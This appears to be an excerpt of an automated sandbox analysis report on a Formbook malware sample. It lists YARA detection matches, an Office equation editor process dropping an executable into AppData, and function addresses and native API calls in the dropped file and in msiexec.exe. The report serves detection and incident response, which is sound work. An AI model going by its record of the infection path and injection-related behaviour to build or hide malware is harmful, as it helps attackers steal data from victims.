          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D6AF8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB20
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67C0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D9918
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A80
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB10
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67AF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_011094B4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E423
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E507
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D5A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E5B3
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DE46
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409E60
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DFA2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E0C6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099D005
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098905A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00973040
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E2E9
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A11238
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009963DB
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096F3CF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00972305
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00977353
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009BA37B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00981489
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A5485
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098C5F0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097351F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00974680
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097E6C1
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A12622
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F579A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C7BC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0F8EE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C85C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099286D
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009729B2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1098E
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009869FE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F5955
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A23A83
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1CBA4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096FBD7
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009FDBDA
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00997B00
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0FDDD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A0D3B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097CD5B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A2E2F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098EE4C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00980F3F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099DF7C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A036
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00291082
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00292D02
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00298912
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E5CD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029B232
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B30
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B32
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_011094B4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C1238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E2E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02527353
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0256A37B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02522305
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025463DB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251F3CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0253905A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02523040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0254D005
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0251E0C6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C2622
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0252E6C1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02524680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025557C3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025A579A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252C7BC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02555485
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02531489
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252351F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0253C5F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025D3A83
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02547B00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025ADBDA
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0251FBD7
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025CCBA4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252C85C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0254286D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025BF8EE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025A5955
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025369FE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025C098E
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025229B2
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0253EE4C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02552E2F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0254DF7C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02530F3F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0252CD5B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_02550D3B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_025BFDDD
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012E5B3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012D5A6
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00112D90
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012DE46
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00119E60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_00112FB0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 7_2_0012DFA2
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: String function: 009B3F92 appears 105 times
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: String function: 009B373B appears 238 times
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: String function: 0096DF5C appears 104 times
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: String function: 0096E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: String function: 009DF970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0258F970 appears 81 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0251DF5C appears 106 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0256373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 02563F92 appears 108 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0251E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A360 NtCreateFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A410 NtReadFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A490 NtClose,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A35A NtCreateFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A40A NtReadFile,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0041A48A NtClose,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_009600C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_00960078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\seasonhd72463.exe | Code function: 5_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,
